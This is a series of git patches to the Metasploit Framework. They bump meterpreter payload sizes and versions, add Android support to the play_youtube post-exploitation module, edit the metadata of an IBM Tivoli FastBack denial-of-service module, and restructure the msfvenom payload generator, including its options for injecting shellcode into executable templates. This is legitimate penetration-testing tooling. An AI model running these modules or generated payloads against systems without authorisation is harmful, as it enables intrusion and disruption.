a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 831e479db2..9b299268cf 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 957487 + CachedSize = 957999 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index f84eac31bd..33c1f06b81 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit3 - CachedSize = 957487 + CachedSize = 957999 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index 100760fd6d..8cdbcd13e4 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index 7d493b49e9..43a55d8c01 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1189955 + CachedSize = 1190467 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index 951dad4425..5207a0b0d4 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1189955 + CachedSize = 1190467 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index 519e5ed6d3..ea5cab3cc8 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index 7ed67c7a06..5dddb7f1c8 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows From ed5cf821b2dd21200791fdc9c93acf41300e6b90 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Wed, 10 Feb 2016 23:21:20 -0600 Subject: [PATCH 56/71] bump payloads to 1.1.0 --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index ea2654ff4a..32690ca571 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ PATH metasploit-concern (= 1.0.0) metasploit-credential (= 1.0.1) metasploit-model (= 1.0.0) - metasploit-payloads (= 1.0.24) + metasploit-payloads (= 1.1.0) metasploit_data_models (= 1.2.10) msgpack network_interface (~> 0.0.1) @@ -124,7 +124,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.0.24) + metasploit-payloads (1.1.0) metasploit_data_models (1.2.10) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 32bcb1cd36..0aba1e8d59 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.0.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.0.24' + spec.add_runtime_dependency 'metasploit-payloads', '1.1.0' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From e738b5922d74a823687bac558fb2b54ca47f08a9 Mon Sep 17 00:00:00 2001 From: Tim <timrlw@gmail.com> Date: Tue, 12 Jan 2016 08:13:29 +0000 Subject: [PATCH 57/71] fix play_youtube to work on Android --- modules/post/multi/manage/play_youtube.rb | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index 0c5d85ce3d..3d44dba25c 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -94,6 +94,19 @@ class Metasploit3 < Msf::Post true end + # + # The Android version is launched via an Intent + # + def android_start_video(id) + intenturl = "intent://youtube.com/watch?v=#{id}&autoplay=1#Intent;scheme=http;action=android.intent.action.VIEW;end" + begin + session.android.activity_start(intenturl) + rescue Rex::Post::Meterpreter::RequestError => e + return false + end + true + end + def start_video(id) case session.platform when /osx/ @@ -102,6 +115,8 @@ class Metasploit3 < Msf::Post win_start_video(id) when /linux/ linux_start_video(id) + when /android/ + android_start_video(id) end end From 31210938984ee4543a7ccbc3959df1106886c389 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 11 Feb 2016 22:04:05 -0600 Subject: [PATCH 58/71] Update metadata, plus other minor changes --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 27 ++++++++++------------- 1 file changed, 12 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 6d0fc435e0..f04adddfdf 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -12,11 +12,11 @@ class Metasploit4 < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", + 'Name' => " Server Opcode 0x534 Denial of Service", 'Description' => %q{ - This module exploits a denial of service condition present in IBM Tivoli Storage Manager FastBack Server - when dealing with packets triggering the opcode 0x534 handler - }, + This module exploits a denial of service condition present in IBM Tivoli Storage Manager + FastBack Server when dealing with packets triggering the opcode 0x534 handler. + }, 'License' => MSF_LICENSE, 'Author' => [ @@ -25,16 +25,16 @@ class Metasploit4 < Msf::Auxiliary ], 'References' => [ - ['URL', 'https://www.exploit-db.com/exploits/38979/'] + ['EDB', '38979'], + ['OSVDB', '132307'] ], 'DisclosureDate' => "Dec 15 2015", - 'DefaultOptions' => {} - )) + )) - register_options( - [ - Opt::RPORT(11460) - ], self.class) + register_options( + [ + Opt::RPORT(11460) + ], self.class) end def tv_pkt(opcode, p1="", p2="", p3="") @@ -60,12 +60,9 @@ class Metasploit4 < Msf::Auxiliary end def run - ip = datastore['RHOST'] - port = datastore['RPORT'] - target_opcode = 0x534 connect - print_status("Connected to: #{datastore['RHOST'].to_s} port: #{datastore['RPORT']}") + print_status("Connected to: #{rhost} port: #{rport}") print_status("Sending malicious packet") p = tv_pkt(target_opcode, From 541e3972f0e4c9dfb62f74b5161d01cba7222816 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Fri, 12 Feb 2016 10:49:18 -0600 Subject: [PATCH 59/71] No real reason for this check And it breaks stuff when msfvenom is run as a symlink --- msfvenom | 616 +++++++++++++++++++++++++++---------------------------- 1 file changed, 306 insertions(+), 310 deletions(-) diff --git a/msfvenom b/msfvenom index 36a8f7be05..6c25288081 100755 --- a/msfvenom +++ b/msfvenom @@ -1,365 +1,361 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -if __FILE__ == $0 +msfbase = __FILE__ +while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +end - msfbase = __FILE__ - while File.symlink?(msfbase) - msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) +require 'msfenv' + +$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] + +require 'rex' +require 'msf/ui' +require 'msf/base' +require 'msf/core/payload_generator' + + +class MsfVenomError < StandardError; end +class UsageError < MsfVenomError; end +class NoTemplateError < MsfVenomError; end +class IncompatibleError < MsfVenomError; end + + +require 'optparse' + + +# Creates a new framework object. +# +# @note Ignores any previously cached value. +# @param (see ::Msf::Simple::Framework.create) +# @return [Msf::Framework] +def init_framework(create_opts={}) + create_opts[:module_types] ||= [ + ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP + ] + @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true)) +end + +# Cached framework object +# +# @return [Msf::Framework] +def framework + return @framework if @framework + + init_framework + + @framework +end + + +def parse_args(args) + opts = {} + datastore = {} + opt = OptionParser.new + banner = "MsfVenom - a Metasploit standalone payload generator.\n" + banner << "Also a replacement for msfpayload and msfencode.\n" + banner << "Usage: #{$0} [options] <var=val>" + opt.banner = banner + opt.separator('') + opt.separator('Options:') + + opt.on('-p', '--payload <payload>', String, + 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p| + if p == '-' + opts[:payload] = 'stdin' + else + opts[:payload] = p + end end - $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) - require 'msfenv' - - $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] - - require 'rex' - require 'msf/ui' - require 'msf/base' - require 'msf/core/payload_generator' - - - class MsfVenomError < StandardError; end - class UsageError < MsfVenomError; end - class NoTemplateError < MsfVenomError; end - class IncompatibleError < MsfVenomError; end - - - require 'optparse' - - - # Creates a new framework object. - # - # @note Ignores any previously cached value. - # @param (see ::Msf::Simple::Framework.create) - # @return [Msf::Framework] - def init_framework(create_opts={}) - create_opts[:module_types] ||= [ - ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP - ] - @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true)) + opt.on('--payload-options', "List the payload's standard options") do + opts[:list_options] = true end - # Cached framework object - # - # @return [Msf::Framework] - def framework - return @framework if @framework - - init_framework - - @framework + opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| + if l.nil? or l.empty? + l = ["all"] + end + opts[:list] = l end + opt.on('-n', '--nopsled <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| + opts[:nops] = n.to_i + end - def parse_args(args) - opts = {} - datastore = {} - opt = OptionParser.new - banner = "MsfVenom - a Metasploit standalone payload generator.\n" - banner << "Also a replacement for msfpayload and msfencode.\n" - banner << "Usage: #{$0} [options] <var=val>" - opt.banner = banner - opt.separator('') - opt.separator('Options:') + opt.on('-f', '--format <format>', String, "Output format (use --help-formats for a list)") do |f| + opts[:format] = f + end - opt.on('-p', '--payload <payload>', String, - 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p| - if p == '-' - opts[:payload] = 'stdin' - else - opts[:payload] = p - end + opt.on('--help-formats', String, "List available formats") do + init_framework(:module_types => []) + msg = "Executable formats\n" + + "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + + "Transform formats\n" + + "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") + raise UsageError, msg + end + + opt.on('-e', '--encoder <encoder>', String, 'The encoder to use') do |e| + opts[:encoder] = e + end + + opt.on('-a', '--arch <arch>', String, 'The architecture to use') do |a| + opts[:arch] = a + end + + opt.on('--platform <platform>', String, 'The platform of the payload') do |l| + opts[:platform] = l + end + + opt.on('--help-platforms', String, 'List available platforms') do + init_framework(:module_types => []) + supported_platforms = [] + Msf::Module::Platform.subclasses.each {|c| supported_platforms << "#{c.realname.downcase}"} + msg = "Platforms\n" + + "\t" + supported_platforms * ", " + raise UsageError, msg + end + + opt.on('-s', '--space <length>', Integer, 'The maximum size of the resulting payload') do |s| + opts[:space] = s + end + + opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| + opts[:encoder_space] = s + end + + opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| + opts[:badchars] = Rex::Text.hex_to_raw(b) + end + + opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i| + opts[:iterations] = i + end + + opt.on('-c', '--add-code <path>', String, 'Specify an additional win32 shellcode file to include') do |x| + opts[:add_code] = x + end + + opt.on('-x', '--template <path>', String, 'Specify a custom executable file to use as a template') do |x| + opts[:template] = x + end + + opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do + opts[:keep] = true + end + + opt.on('-o', '--out <path>', 'Save the payload') do |x| + opts[:out] = x + end + + opt.on('-v', '--var-name <name>', String, 'Specify a custom variable name to use for certain output formats') do |x| + opts[:var_name] = x + end + + opt.on('--smallest', 'Generate the smallest possible payload') do + opts[:smallest] = true + end + + opt.on_tail('-h', '--help', 'Show this message') do + raise UsageError, "#{opt}" + end + + begin + opt.parse!(args) + rescue OptionParser::InvalidOption => e + raise UsageError, "Invalid option\n#{opt}" + rescue OptionParser::MissingArgument => e + raise UsageError, "Missing required argument for option\n#{opt}" + end + + if opts.empty? + raise UsageError, "No options\n#{opt}" + end + + if args + args.each do |x| + k,v = x.split('=', 2) + datastore[k.upcase] = v.to_s end - - opt.on('--payload-options', "List the payload's standard options") do - opts[:list_options] = true + if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil? + datastore['LHOST'] = Rex::Socket.source_address end + end - opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| - if l.nil? or l.empty? - l = ["all"] - end - opts[:list] = l - end - - opt.on('-n', '--nopsled <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| - opts[:nops] = n.to_i - end - - opt.on('-f', '--format <format>', String, "Output format (use --help-formats for a list)") do |f| - opts[:format] = f - end - - opt.on('--help-formats', String, "List available formats") do - init_framework(:module_types => []) - msg = "Executable formats\n" + - "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + - "Transform formats\n" + - "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") - raise UsageError, msg - end - - opt.on('-e', '--encoder <encoder>', String, 'The encoder to use') do |e| - opts[:encoder] = e - end - - opt.on('-a', '--arch <arch>', String, 'The architecture to use') do |a| - opts[:arch] = a - end - - opt.on('--platform <platform>', String, 'The platform of the payload') do |l| - opts[:platform] = l - end - - opt.on('--help-platforms', String, 'List available platforms') do - init_framework(:module_types => []) - supported_platforms = [] - Msf::Module::Platform.subclasses.each {|c| supported_platforms << "#{c.realname.downcase}"} - msg = "Platforms\n" + - "\t" + supported_platforms * ", " - raise UsageError, msg - end - - opt.on('-s', '--space <length>', Integer, 'The maximum size of the resulting payload') do |s| - opts[:space] = s - end - - opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| - opts[:encoder_space] = s - end - - opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| - opts[:badchars] = Rex::Text.hex_to_raw(b) - end - - opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i| - opts[:iterations] = i - end - - opt.on('-c', '--add-code <path>', String, 'Specify an additional win32 shellcode file to include') do |x| - opts[:add_code] = x - end - - opt.on('-x', '--template <path>', String, 'Specify a custom executable file to use as a template') do |x| - opts[:template] = x - end - - opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do - opts[:keep] = true - end - - opt.on('-o', '--out <path>', 'Save the payload') do |x| - opts[:out] = x - end - - opt.on('-v', '--var-name <name>', String, 'Specify a custom variable name to use for certain output formats') do |x| - opts[:var_name] = x - end - - opt.on('--smallest', 'Generate the smallest possible payload') do - opts[:smallest] = true - end - - opt.on_tail('-h', '--help', 'Show this message') do - raise UsageError, "#{opt}" - end + if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin + opts[:payload] = "stdin" + end + if opts[:payload] == 'stdin' and not opts[:list] + $stderr.puts "Attempting to read payload from STDIN..." begin - opt.parse!(args) - rescue OptionParser::InvalidOption => e - raise UsageError, "Invalid option\n#{opt}" - rescue OptionParser::MissingArgument => e - raise UsageError, "Missing required argument for option\n#{opt}" - end - - if opts.empty? - raise UsageError, "No options\n#{opt}" - end - - if args - args.each do |x| - k,v = x.split('=', 2) - datastore[k.upcase] = v.to_s - end - if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil? - datastore['LHOST'] = Rex::Socket.source_address + ::Timeout.timeout(30) do + opts[:stdin] = payload_stdin end + rescue Timeout::Error + opts[:stdin] = '' end - - if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin - opts[:payload] = "stdin" - end - - if opts[:payload] == 'stdin' and not opts[:list] - $stderr.puts "Attempting to read payload from STDIN..." - begin - ::Timeout.timeout(30) do - opts[:stdin] = payload_stdin - end - rescue Timeout::Error - opts[:stdin] = '' - end - end - - opts[:datastore] = datastore - - opts end + opts[:datastore] = datastore - # Read a raw payload from stdin (or whatever IO object we're currently - # using as stdin, see {#initialize}) - # - # @return [String] - def payload_stdin - @in = $stdin - @in.binmode - payload = @in.read - payload - end + opts +end - def dump_payloads - init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)", - 'Columns' => - [ - "Name", - "Description" - ]) - framework.payloads.each_module { |name, mod| - tbl << [ name, mod.new.description.split.join(' ') ] - } +# Read a raw payload from stdin (or whatever IO object we're currently +# using as stdin, see {#initialize}) +# +# @return [String] +def payload_stdin + @in = $stdin + @in.binmode + payload = @in.read + payload +end - "\n" + tbl.to_s + "\n" - end +def dump_payloads + init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)", + 'Columns' => + [ + "Name", + "Description" + ]) - def dump_encoders(arch = nil) - init_framework(:module_types => [ ::Msf::MODULE_ENCODER ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""), - 'Columns' => - [ - "Name", - "Rank", - "Description" - ]) - cnt = 0 + framework.payloads.each_module { |name, mod| + tbl << [ name, mod.new.description.split.join(' ') ] + } - framework.encoders.each_module( - 'Arch' => arch ? arch.split(',') : nil) { |name, mod| + "\n" + tbl.to_s + "\n" +end + +def dump_encoders(arch = nil) + init_framework(:module_types => [ ::Msf::MODULE_ENCODER ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""), + 'Columns' => + [ + "Name", + "Rank", + "Description" + ]) + cnt = 0 + + framework.encoders.each_module( + 'Arch' => arch ? arch.split(',') : nil) { |name, mod| tbl << [ name, mod.rank_to_s, mod.new.name ] cnt += 1 } (cnt > 0) ? "\n" + tbl.to_s + "\n" : "\nNo compatible encoders found.\n\n" - end +end - def dump_nops - init_framework(:module_types => [ ::Msf::MODULE_NOP ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework NOPs (#{framework.stats.num_nops} total)", - 'Columns' => - [ - "Name", - "Description" - ]) +def dump_nops + init_framework(:module_types => [ ::Msf::MODULE_NOP ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework NOPs (#{framework.stats.num_nops} total)", + 'Columns' => + [ + "Name", + "Description" + ]) - framework.nops.each_module { |name, mod| - tbl << [ name, mod.new.description.split.join(' ') ] - } + framework.nops.each_module { |name, mod| + tbl << [ name, mod.new.description.split.join(' ') ] + } - "\n" + tbl.to_s + "\n" - end + "\n" + tbl.to_s + "\n" +end - begin - generator_opts = parse_args(ARGV) - rescue MsfVenomError, Msf::OptionValidateError => e - $stderr.puts "Error: #{e.message}" - exit(1) - end +begin + generator_opts = parse_args(ARGV) +rescue MsfVenomError, Msf::OptionValidateError => e + $stderr.puts "Error: #{e.message}" + exit(1) +end - if generator_opts[:list] - generator_opts[:list].each do |mod| - case mod.downcase - when "payloads", "payload", "p" - $stdout.puts dump_payloads - when "encoders", "encoder", "e" - $stdout.puts dump_encoders(generator_opts[:arch]) - when "nops", "nop", "n" - $stdout.puts dump_nops - when "all" - # Init here so #dump_payloads doesn't create a framework with - # only payloads, etc. - init_framework - $stdout.puts dump_payloads - $stdout.puts dump_encoders - $stdout.puts dump_nops - else - $stderr.puts "Invalid module type. These are valid: payloads, encoders, nops, all" - end +if generator_opts[:list] + generator_opts[:list].each do |mod| + case mod.downcase + when "payloads", "payload", "p" + $stdout.puts dump_payloads + when "encoders", "encoder", "e" + $stdout.puts dump_encoders(generator_opts[:arch]) + when "nops", "nop", "n" + $stdout.puts dump_nops + when "all" + # Init here so #dump_payloads doesn't create a framework with + # only payloads, etc. + init_framework + $stdout.puts dump_payloads + $stdout.puts dump_encoders + $stdout.puts dump_nops + else + $stderr.puts "Invalid module type. These are valid: payloads, encoders, nops, all" end - exit(0) + end + exit(0) +end + +if generator_opts[:list_options] + payload_mod = framework.payloads.create(generator_opts[:payload]) + + if payload_mod.nil? + $stderr.puts "Invalid payload: #{generator_opts[:payload]}" + exit end - if generator_opts[:list_options] - payload_mod = framework.payloads.create(generator_opts[:payload]) + $stderr.puts "Options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_module(payload_mod, ' ') - if payload_mod.nil? - $stderr.puts "Invalid payload: #{generator_opts[:payload]}" - exit - end + $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, ' ') - $stderr.puts "Options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_module(payload_mod, ' ') + $stderr.puts "Evasion options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_evasion_options(payload_mod, ' ') + exit(0) +end - $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, ' ') +generator_opts[:framework] = framework +generator_opts[:cli] = true - $stderr.puts "Evasion options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_evasion_options(payload_mod, ' ') - exit(0) - end +begin + venom_generator = Msf::PayloadGenerator.new(generator_opts) + payload = venom_generator.generate_payload +rescue ::Exception => e + elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") + $stderr.puts "Error: #{e.message}" +end - generator_opts[:framework] = framework - generator_opts[:cli] = true +# No payload generated, no point to go on +exit(2) unless payload +if generator_opts[:out] begin - venom_generator = Msf::PayloadGenerator.new(generator_opts) - payload = venom_generator.generate_payload + ::File.open(generator_opts[:out], 'wb') do |f| + f.write(payload) + end + $stderr.puts "Saved as: #{generator_opts[:out]}" rescue ::Exception => e + # If I can't save it, then I can't save it. I don't think it matters what error. elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") $stderr.puts "Error: #{e.message}" end - - # No payload generated, no point to go on - exit(2) unless payload - - if generator_opts[:out] - begin - ::File.open(generator_opts[:out], 'wb') do |f| - f.write(payload) - end - $stderr.puts "Saved as: #{generator_opts[:out]}" - rescue ::Exception => e - # If I can't save it, then I can't save it. I don't think it matters what error. - elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") - $stderr.puts "Error: #{e.message}" - end - else - output_stream = $stdout - output_stream.binmode - output_stream.write payload - # trailing newline for pretty output - $stderr.puts unless payload =~ /\n$/ - end - +else + output_stream = $stdout + output_stream.binmode + output_stream.write payload + # trailing newline for pretty output + $stderr.puts unless payload =~ /\n$/ end From 93cc7d58baf76bceaf19f16721ca847292d65373 Mon Sep 17 00:00:00 2001 From: Metasploit <metasploit@rapid7.com> Date: Fri, 12 Feb 2016 15:38:50 -0800 Subject: [PATCH 60/71] Bump version of framework to 4.11.11 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 32690ca571..4cf7c7588b 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.10) + metasploit-framework (4.11.11) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 68443720c0..a5241a7344 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.10" + VERSION = "4.11.11" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 1f58ad15ace7ebff4d03a786cfc2f8c1c8a7085e Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Mon, 15 Feb 2016 16:21:24 -0600 Subject: [PATCH 61/71] Browser::Exploit::Server needs to have vprint* --- lib/msf/core/exploit/remote/browser_exploit_server.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index 1ad7cffa70..1f6da0ecf5 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -7,6 +7,7 @@ require 'set' require 'rex/exploitation/js' require 'msf/core/exploit/jsobfu' require 'msf/core/exploit/remote/browser_profile_manager' +require 'msf/core/module' ### # @@ -28,6 +29,8 @@ module Msf include Msf::Exploit::RopDb include Msf::Exploit::JSObfu include Msf::Exploit::Remote::BrowserProfileManager + include Msf::Module::UI::Line::Verbose + include Msf::Module::UI::Message::Verbose # this must be static between runs, otherwise the older cookies will be ignored DEFAULT_COOKIE_NAME = '__ua' @@ -136,7 +139,6 @@ module Msf clear_browser_profiles unless self.datastore['BrowserProfilePrefix'] end - # Returns the custom 404 URL set by the user # # @return [String] From 1263a82d1e77ece79ef791fd8b2dc20f8861a8d4 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Tue, 16 Feb 2016 09:12:34 -0600 Subject: [PATCH 62/71] update database.yml.example to be something reasonable --- config/database.yml.example | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/config/database.yml.example b/config/database.yml.example index 060dd23625..b04aede6b0 100644 --- a/config/database.yml.example +++ b/config/database.yml.example @@ -1,9 +1,9 @@ -# Please only use postgresql bound to a TCP port. -# Only postgresql is supportable for metasploit-framework -# these days. (No SQLite, no MySQL). -# # To set up a metasploit database, follow the directions hosted at: # http://r-7.co/MSF-DEV#set-up-postgresql +# +# Kali Linux and the Omnibus installers both include an easy wrapper script for +# managing your database, which may be more convenient than rolling your own. + development: &pgsql adapter: postgresql database: metasploit_framework_development @@ -11,7 +11,7 @@ development: &pgsql password: __________________________________ host: localhost port: 5432 - pool: 5 + pool: 200 timeout: 5 # You will often want to seperate your databases between dev From 35e0a433eaca11ab416158ed7d14d1b8d2960a9e Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Tue, 16 Feb 2016 14:45:00 -0600 Subject: [PATCH 63/71] Make error output more useful --- lib/msf/ui/console/command_dispatcher/core.rb | 60 +++++++++---------- 1 file changed, 27 insertions(+), 33 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index a05d06080f..a6165c2bbb 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1306,12 +1306,12 @@ class Core return false end - arg = args.shift - case arg + action = args.shift + case action when "add", "remove", "del" if (args.length < 3) - print_error("Missing arguments to route #{arg}.") + print_error("Missing arguments to route #{action}.") return false end @@ -1326,44 +1326,38 @@ class Core return false end - gw = nil + gateway_name = args.pop - # Satisfy case problems - args[2] = "Local" if (args[2] =~ /local/i) + gateway = nil - begin - # If the supplied gateway is a global 